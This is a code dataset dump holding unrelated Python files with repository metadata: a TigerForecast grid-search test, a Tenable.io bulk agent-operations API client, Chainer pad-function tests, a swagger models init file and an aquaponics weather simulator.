2020-07-28T09:07:29.000Z
|
tigerforecast/utils/autotuning/tests/test_grid_search.py
|
danielsuo/TigerForecast
|
ae18b169d96dd81db88ab27a8b055036845d3a8f
|
[
"Apache-2.0"
] | null | null | null |
tigerforecast/utils/autotuning/tests/test_grid_search.py
|
danielsuo/TigerForecast
|
ae18b169d96dd81db88ab27a8b055036845d3a8f
|
[
"Apache-2.0"
] | 1
|
2021-04-12T22:39:26.000Z
|
2021-04-12T22:39:26.000Z
|
"""
unit tests for GridSearch class
"""
import tigerforecast
from tigerforecast.utils.autotuning import GridSearch
from tigerforecast.utils.optimizers import *
import jax.numpy as np
import matplotlib.pyplot as plt
import itertools
def mse(a, b):
    # `mse` is used in the evaluation loops below but was never imported;
    # defined here as summed squared error (an assumption -- swap in
    # tigerforecast's own metric if it ships one).
    return np.sum((a - b) ** 2)
def test_grid_search(show=False):
test_grid_search_arma(show=show)
test_grid_search_lstm(show=show)
print("test_grid_search passed")
def test_grid_search_lstm(show=False):
problem_id = "SP500-v0"
method_id = "LSTM"
    problem_params = {}  # SP500 takes no problem params ({'p': 4, 'q': 1} would be for ARMA)
method_params = {'n':1, 'm':1}
    def loss(a, b):  # summed squared error between prediction and target
        return np.sum((a - b) ** 2)
    search_space = {'l': [3, 4, 5, 6], 'h': [2, 5, 8], 'optimizer': []}  # parameters for the LSTM method
opts = [Adam, Adagrad, ONS, OGD]
lr_start, lr_stop = -1, -3 # search learning rates from 10^start to 10^stop
learning_rates = np.logspace(lr_start, lr_stop, 1+2*np.abs(lr_start - lr_stop))
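    # With lr_start=-1 and lr_stop=-3 this yields 1 + 2*|start - stop| = 5
    # learning rates, log-spaced over [1e-1, 1e-3].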
for opt, lr in itertools.product(opts, learning_rates):
search_space['optimizer'].append(opt(learning_rate=lr)) # create instance and append
trials, min_steps = 10, 100
hpo = GridSearch() # hyperparameter optimizer
optimal_params, optimal_loss = hpo.search(method_id, method_params, problem_id, problem_params, loss,
        search_space, trials=trials, smoothing=10, min_steps=min_steps, verbose=show)  # run each model for at least min_steps steps
if show:
print("optimal params: ", optimal_params)
print("optimal loss: ", optimal_loss)
# test resulting method params
method = tigerforecast.method(method_id)
method.initialize(**optimal_params)
problem = tigerforecast.problem(problem_id)
x = problem.initialize(**problem_params)
loss = []
if show:
print("run final test with optimal parameters")
for t in range(5000):
y_pred = method.predict(x)
y_true = problem.step()
loss.append(mse(y_pred, y_true))
method.update(y_true)
x = y_true
if show:
print("plot results")
plt.plot(loss)
plt.show(block=False)
plt.pause(10)
plt.close()
def test_grid_search_arma(show=False):
problem_id = "ARMA-v0"
method_id = "AutoRegressor"
problem_params = {'p':3, 'q':2}
method_params = {}
    def loss(a, b):  # summed squared error between prediction and target
        return np.sum((a - b) ** 2)
search_space = {'p': [1,2,3,4,5], 'optimizer':[]} # parameters for ARMA method
opts = [Adam, Adagrad, ONS, OGD]
lr_start, lr_stop = 0, -4 # search learning rates from 10^start to 10^stop
learning_rates = np.logspace(lr_start, lr_stop, 1+2*np.abs(lr_start - lr_stop))
for opt, lr in itertools.product(opts, learning_rates):
search_space['optimizer'].append(opt(learning_rate=lr)) # create instance and append
trials, min_steps = 25, 250
hpo = GridSearch() # hyperparameter optimizer
optimal_params, optimal_loss = hpo.search(method_id, method_params, problem_id, problem_params, loss,
        search_space, trials=trials, smoothing=10, min_steps=min_steps, verbose=show)  # run each model for at least min_steps steps
if show:
print("optimal params: ", optimal_params)
print("optimal loss: ", optimal_loss)
# test resulting method params
method = tigerforecast.method(method_id)
method.initialize(**optimal_params)
problem = tigerforecast.problem(problem_id)
x = problem.initialize(**problem_params)
loss = []
if show:
print("run final test with optimal parameters")
for t in range(5000):
y_pred = method.predict(x)
y_true = problem.step()
loss.append(mse(y_pred, y_true))
method.update(y_true)
x = y_true
if show:
print("plot results")
plt.plot(loss)
plt.show(block=False)
plt.pause(10)
plt.close()
if __name__ == "__main__":
test_grid_search(show=True)
| 34.711712
| 122
| 0.663898
| 540
| 3,853
| 4.551852
| 0.222222
| 0.042311
| 0.03987
| 0.031733
| 0.807567
| 0.771359
| 0.771359
| 0.771359
| 0.771359
| 0.771359
| 0
| 0.024867
| 0.217233
| 3,853
| 110
| 123
| 35.027273
| 0.790119
| 0.11783
| 0
| 0.681818
| 0
| 0
| 0.078768
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034091
| false
| 0.011364
| 0.068182
| 0
| 0.102273
| 0.102273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
85cc887b024bba07d53717da85a82598874fc86f
| 5,253
|
py
|
Python
|
tenable_io/api/bulk_operations.py
|
skrtu/Tenable.io-SDK-for-Python
|
fde8871ba558666609183ac8702149ecf08421b5
|
[
"MIT"
] | 90
|
2017-02-02T18:36:17.000Z
|
2022-02-05T17:58:50.000Z
|
tenable_io/api/bulk_operations.py
|
skrtu/Tenable.io-SDK-for-Python
|
fde8871ba558666609183ac8702149ecf08421b5
|
[
"MIT"
] | 64
|
2017-02-03T00:54:00.000Z
|
2020-08-06T14:06:50.000Z
|
tenable_io/api/bulk_operations.py
|
skrtu/Tenable.io-SDK-for-Python
|
fde8871ba558666609183ac8702149ecf08421b5
|
[
"MIT"
] | 49
|
2017-02-03T01:01:00.000Z
|
2022-02-25T13:25:28.000Z
|
from tenable_io.api.base import BaseApi, BaseRequest
from tenable_io.api.models import BulkOpTask
class BulkOperationsApi(BaseApi):
def bulk_add_agent(self, group_id, bulk_add_agent, scanner_id=1):
"""Creates a bulk operation task to add agents to a group.
:param group_id: The agent group ID.
        :param bulk_add_agent: An instance of :class:`BulkOpAddAgentRequest`.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.post('scanners/%(scanner_id)s/agent-groups/%(group_id)s/agents/_bulk/add',
bulk_add_agent,
path_params={
'scanner_id': scanner_id,
'group_id': group_id
})
return BulkOpTask.from_json(response.text)
def bulk_remove_agent(self, group_id, bulk_remove_agent, scanner_id=1):
"""Create a bulk operation task to remove agents from a group.
:param group_id: The agent group ID.
        :param bulk_remove_agent: An instance of :class:`BulkOpRemoveAgentRequest`.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.post('scanners/%(scanner_id)s/agent-groups/%(group_id)s/agents/_bulk/remove',
bulk_remove_agent,
path_params={
'scanner_id': scanner_id,
'group_id': group_id
})
return BulkOpTask.from_json(response.text)
def bulk_unlink_agent(self, bulk_unlink_agent, scanner_id=1):
"""Creates a bulk operation task to unlink (delete) agents.
        :param bulk_unlink_agent: An instance of :class:`BulkOpUnlinkAgentRequest`.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.post('scanners/%(scanner_id)s/agents/_bulk/unlink',
bulk_unlink_agent,
path_params={
'scanner_id': scanner_id,
})
return BulkOpTask.from_json(response.text)
def bulk_agent_group_status(self, group_id, task_uuid, scanner_id=1):
"""Check the status of a bulk operation on an agent group.
:param group_id: The agent group ID.
:param task_uuid: The uuid of the task.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.get('scanners/%(scanner_id)s/agent-groups/%(group_id)s/agents/_bulk/%(task_uuid)s',
path_params={
'scanner_id': scanner_id,
'group_id': group_id,
'task_uuid': task_uuid
})
return BulkOpTask.from_json(response.text)
def bulk_agent_status(self, task_uuid, scanner_id=1):
"""Check the status of a bulk operation on an agent.
:param task_uuid: The uuid of the task.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.get('scanners/%(scanner_id)s/agents/_bulk/%(task_uuid)s',
path_params={
'scanner_id': scanner_id,
'task_uuid': task_uuid
})
return BulkOpTask.from_json(response.text)
class BulkOpAddAgentRequest(BaseRequest):
def __init__(
self,
items=None
):
"""Request for BulkOperationsApi.bulk_add_agent.
:param items: list of agent ids or uuids to add to the group.
:type items: list[int].
"""
self.items = items
class BulkOpRemoveAgentRequest(BaseRequest):
def __init__(
self,
items=None
):
"""Request for BulkOperationsApi.bulk_remove_agent.
:param items: list of agent ids or uuids to add to the group.
:type items: list[int].
"""
self.items = items
class BulkOpUnlinkAgentRequest(BaseRequest):
def __init__(
self,
items=None
):
"""Request for BulkOperationsApi.bulk_unlink_agent.
:param items: list of agent ids or uuids to add to the group.
:type items: list[int].
"""
self.items = items
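# Minimal usage sketch (assumptions: the SDK client exposes this module as
# `client.bulk_operations`, and BulkOpTask carries the task uuid -- adjust the
# names to the actual client wiring):
#
#   request = BulkOpAddAgentRequest(items=[101, 102])
#   task = client.bulk_operations.bulk_add_agent(group_id=7, bulk_add_agent=request)
#   status = client.bulk_operations.bulk_agent_group_status(7, task.task_uuid)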
| 40.72093
| 115
| 0.561203
| 574
| 5,253
| 4.919861
| 0.130662
| 0.095609
| 0.033994
| 0.048159
| 0.831091
| 0.786473
| 0.782932
| 0.771955
| 0.771955
| 0.738669
| 0
| 0.001474
| 0.354083
| 5,253
| 128
| 116
| 41.039063
| 0.830828
| 0.363602
| 0
| 0.661017
| 0
| 0.016949
| 0.132088
| 0.101401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135593
| false
| 0
| 0.033898
| 0
| 0.322034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
85e33b3ea6340563cc28d92497ae74c26153eb71
| 281
|
py
|
Python
|
swagger_server/models/__init__.py
|
DITAS-Project/data-analytics
|
e337aa707129b02750162f0cd60b5199a07ade22
|
[
"Apache-2.0"
] | null | null | null |
swagger_server/models/__init__.py
|
DITAS-Project/data-analytics
|
e337aa707129b02750162f0cd60b5199a07ade22
|
[
"Apache-2.0"
] | 7
|
2019-03-04T17:48:48.000Z
|
2019-11-04T14:11:30.000Z
|
swagger_server/models/__init__.py
|
DITAS-Project/data-analytics
|
e337aa707129b02750162f0cd60b5199a07ade22
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models into model package
from swagger_server.models.metric_res import MetricRes
from swagger_server.models.metric_res_inner import MetricResInner
from swagger_server.models.resources import Resources
| 31.222222
| 65
| 0.854093
| 39
| 281
| 5.871795
| 0.538462
| 0.144105
| 0.222707
| 0.30131
| 0.279476
| 0.279476
| 0
| 0
| 0
| 0
| 0
| 0.007937
| 0.103203
| 281
| 8
| 66
| 35.125
| 0.900794
| 0.209964
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
85e70cf2d470176e474feaf640f7bbe9577867bb
| 3,560
|
py
|
Python
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
zaltoprofen/chainer
|
3b03f9afc80fd67f65d5e0395ef199e9506b6ee1
|
[
"MIT"
] | 3,705
|
2017-06-01T07:36:12.000Z
|
2022-03-30T10:46:15.000Z
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
hitsgub/chainer
|
20d4d70f5cdacc1f24f243443f5bebc2055c8f8e
|
[
"MIT"
] | 5,998
|
2017-06-01T06:40:17.000Z
|
2022-03-08T01:42:44.000Z
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
hitsgub/chainer
|
20d4d70f5cdacc1f24f243443f5bebc2055c8f8e
|
[
"MIT"
] | 1,150
|
2017-06-02T03:39:46.000Z
|
2022-03-29T02:29:32.000Z
|
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*testing.product_dict(
[
{'shape': (), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 0, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant'},
{'shape': (2, 3, 2), 'pad_width': ((2, 5), (1, 2), (0, 7)),
'mode': 'constant'},
{'shape': (1, 3, 5, 2), 'pad_width': 2, 'mode': 'constant'}
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
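# The pad_width cases above exercise every form numpy.pad accepts: a scalar
# (same padding on all edges), a single (before, after) pair broadcast to all
# axes, and a per-axis sequence of (before, after) pairs.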
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
class TestPadDefault(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, self.mode)
return y,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, self.mode)
return y_expected.astype(self.dtype),
@testing.parameterize(*testing.product_dict(
[
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant',
'constant_values': 1},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant',
'constant_values': (1, 2)},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant',
'constant_values': ((1, 2), (3, 4))},
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
# Old numpy does not work with multi-dimensional constant_values
@testing.with_requires('numpy>=1.11.1')
class TestPad(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y_expected,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y,
testing.run_module(__name__, __file__)
| 28.709677
| 77
| 0.544101
| 420
| 3,560
| 4.459524
| 0.188095
| 0.059797
| 0.029899
| 0.037373
| 0.846236
| 0.83449
| 0.775227
| 0.775227
| 0.750133
| 0.711159
| 0
| 0.035977
| 0.273876
| 3,560
| 123
| 78
| 28.943089
| 0.688588
| 0.037079
| 0
| 0.613861
| 0
| 0
| 0.156725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079208
| false
| 0
| 0.029703
| 0
| 0.188119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c8274a05db301310a054e1016e89d20f0a6160d1
| 17,365
|
py
|
Python
|
src/AquaponicsSystem/EmulatedHardware/Simulators/ExternalEnvironment/Weather.py
|
Prakhar623/Aquaphonics
|
28b095b80edf3fe294bb6438d15f3bcc2d3e5c47
|
[
"MIT"
] | 1
|
2021-06-30T18:11:55.000Z
|
2021-06-30T18:11:55.000Z
|
src/AquaponicsSystem/EmulatedHardware/Simulators/ExternalEnvironment/Weather.py
|
Prakhar623/Aquaphonics
|
28b095b80edf3fe294bb6438d15f3bcc2d3e5c47
|
[
"MIT"
] | null | null | null |
src/AquaponicsSystem/EmulatedHardware/Simulators/ExternalEnvironment/Weather.py
|
Prakhar623/Aquaphonics
|
28b095b80edf3fe294bb6438d15f3bcc2d3e5c47
|
[
"MIT"
] | 2
|
2021-07-15T13:53:14.000Z
|
2022-02-28T11:44:54.000Z
|
import random
from ...ProjectEssentials import (AutoExecutor, Signal,)
class Weather:
def __init__ (self, externalweathersensor, timespeed=None):
if (type(externalweathersensor).__name__ != 'ExternalWeather'):
raise TypeError("externalweathersensor requires 'ExternalWeather'")
if (type(timespeed).__name__ == 'NoneType'\
or type(timespeed).__name__ == 'int'\
or type(timespeed).__name__ == 'float'):
if (timespeed == None):
timespeed = 1.0
if (timespeed <= 0.0 or timespeed >= 60000.0):
raise ValueError("invalid timespeed '{0}'".format(timespeed))
else:
raise TypeError("timespeed requires 'None' or 'int' or 'float'")
self._dataAttributes = {
"sensor" : externalweathersensor,
# event : [eventexecutor, *signalIDs]
"raining" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_raining,
runType='thread',
times=None,
interval=1800.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
"sunlight" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_sunlight,
runType='thread',
times=None,
interval=900.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
"temperature" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_temperature,
runType='thread',
times=None,
interval=360.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
"humidity" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_humidity,
runType='thread',
times=None,
interval=480.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
}
"""
"randomChanger" : [
AutoExecutor.AutoExecutor(
exec_function=self._randomChanger,
runType='thread',
times=None,
interval=600.0,
timespeed=timespeed,
autopause=False,
daemon=True,
),
],
}
(self._dataAttributes['raining']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['raining'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['raining']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['raining'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['sunlight']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['sunlight'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['sunlight']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['sunlight'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['temperature']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['temperature'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['temperature']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['temperature'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['temperature']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'temperature',
[
self._dataAttributes['temperature'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'temperature',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'humidity',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
"""
def start (self):
if (self._dataAttributes['raining'][0].is_alive()):
self._dataAttributes['raining'][0].start()
if (self._dataAttributes['sunlight'][0].is_alive()):
self._dataAttributes['sunlight'][0].start()
if (self._dataAttributes['temperature'][0].is_alive()):
self._dataAttributes['temperature'][0].start()
if (self._dataAttributes['humidity'][0].is_alive()):
self._dataAttributes['humidity'][0].start()
# if (self._dataAttributes['randomChanger'][0].is_alive()):
# self._dataAttributes['randomChanger'][0].start()
def stop (self):
if (self._dataAttributes['raining'][0].is_alive()):
self._dataAttributes['raining'][0].kill()
if (self._dataAttributes['sunlight'][0].is_alive()):
self._dataAttributes['sunlight'][0].kill()
if (self._dataAttributes['temperature'][0].is_alive()):
self._dataAttributes['temperature'][0].kill()
if (self._dataAttributes['humidity'][0].is_alive()):
self._dataAttributes['humidity'][0].kill()
# if (self._dataAttributes['randomChanger'][0].is_alive()):
# self._dataAttributes['randomChanger'][0].kill()
"""
def _randomChanger (self):
key = random.choice(['raining', 'sunlight', 'temperature', 'humidity',])
if (self._dataAttributes[key][0].is_alive()\
and self._dataAttributes[key][0].is_paused()):
self._dataAttributes[key][0].resume()
"""
def change_raining (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False, False, False, False,
True, True, True, True,
# 40% rain, 60% no rain.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False,
True, True, True, True, True, True, True,
# 70% rain, 30% no rain.
],
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False, False, False, False, False, False,
True, True,
# 20% rain, 80% no rain.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False, False, False,
True, True, True, True, True,
# 50% rain, 50% no rain.
],
),
)
def change_sunlight (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False, False, False,
True, True, True, True, True, True,
# 60% sunlight, 40% no sunlight.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False, False, False, False, False, False, False,
True, True,
# 20% sunlight, 80% no sunlight.
],
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False,
True, True, True, True, True, True, True, True,
# 80% sunlight, 20% no sunlight.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False, False, False, False,
True, True, True, True, True,
# 50% sunlight, 50% no sunlight.
],
),
)
def change_temperature (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment() * 3.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment(True) * 3.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment() * 3.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment() * 2.0),
),
2,
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment(True) * 2.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment(True) * 3.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment() * 2.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment(True) * 1.0),
),
2,
),
)
def change_humidity (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
50.0 - (self._humidityAdjustment(False, True) * 25.0),
50.0 + (self._humidityAdjustment(False, False) * 15.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
60.0 - (self._humidityAdjustment(True, False) * 5.0),
80.0 + (self._humidityAdjustment(True, False) * 15.0),
),
2,
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
10.0 - (self._humidityAdjustment(False, True) * 5.0),
20.0 + (self._humidityAdjustment(True, False) * 10.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
50.0 - (self._humidityAdjustment(True, False) * 25.0),
50.0 + (self._humidityAdjustment(False, True) * 25.0),
),
2,
),
)
def _normalize (self, x, low, high):
return ((x - low)/(high - low))
def _sigmoid (self, x):
return (1/(1 + (2.71828182846) ** (-x)))
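    # _normalize rescales x linearly over [low, high]; _sigmoid (a logistic
    # with a hard-coded approximation of e) then squashes the scaled result
    # into (0, 1), so the adjustment factors below are bounded multipliers.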
def _temperatureAdjustment (self, invert=False):
if (type(invert).__name__ != 'bool'):
raise TypeError("invert requires 'bool'")
temperature = self._dataAttributes['sensor'].read('temperature')
if (temperature >= 40.0 and temperature <= 50.0):
result = self._normalize(temperature, 45.0, 50.0)
elif (temperature >= 30.0 and temperature < 40.0):
result = self._normalize(temperature, 35.0, 40.0)
elif (temperature >= 20.0 and temperature < 30.0):
result = self._normalize(temperature, 25.0, 30.0)
elif (temperature >= 0.0 and temperature < 20.0):
result = self._normalize(temperature, 10.0, 20.0)
        elif (temperature >= -20.0 and temperature < 0.0):
            result = self._normalize(temperature, -10.0, 0.0)
        else:
            # Temperatures above 50.0 or below -20.0 previously left `result`
            # unbound (an UnboundLocalError); fall back to a neutral value.
            result = 0.0
        result *= 7.0
return (self._sigmoid(-result if (invert) else result))
def _humidityAdjustment (self, invert=True, highRate=True):
if (type(invert).__name__ != 'bool'):
raise TypeError("invert requires 'bool'")
if (type(highRate).__name__ != 'bool'):
raise TypeError("highRate requires 'bool'")
temperature = self._dataAttributes['sensor'].read('temperature')
humidity = self._dataAttributes['sensor'].read('humidity')
result = self._normalize(temperature, 20.0, 50.0) * 7.0
result = (self._sigmoid(-result if (invert) else result))
result = self._normalize((result * humidity), 50.0, 100.0) * 7.0
return (self._sigmoid(result if (highRate) else -result))
| 34.591633
| 78
| 0.494328
| 1,421
| 17,365
| 5.896552
| 0.078114
| 0.249194
| 0.203366
| 0.143693
| 0.822771
| 0.761547
| 0.739587
| 0.686597
| 0.666905
| 0.648765
| 0
| 0.023605
| 0.370573
| 17,365
| 501
| 79
| 34.660679
| 0.743001
| 0.030406
| 0
| 0.627063
| 0
| 0
| 0.101845
| 0.001677
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036304
| false
| 0
| 0.006601
| 0.006601
| 0.059406
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c84d652bdad990acb2270426925799537bca7561
| 50,859
|
py
|
Python
|
license_protected_downloads/tests/test_views.py
|
NexellCorp/infrastructure_server_fileserver
|
b2d0cd30b7658735f914c29e401a670d9bb42f92
|
[
"Net-SNMP",
"Xnet",
"Info-ZIP",
"OML"
] | null | null | null |
license_protected_downloads/tests/test_views.py
|
NexellCorp/infrastructure_server_fileserver
|
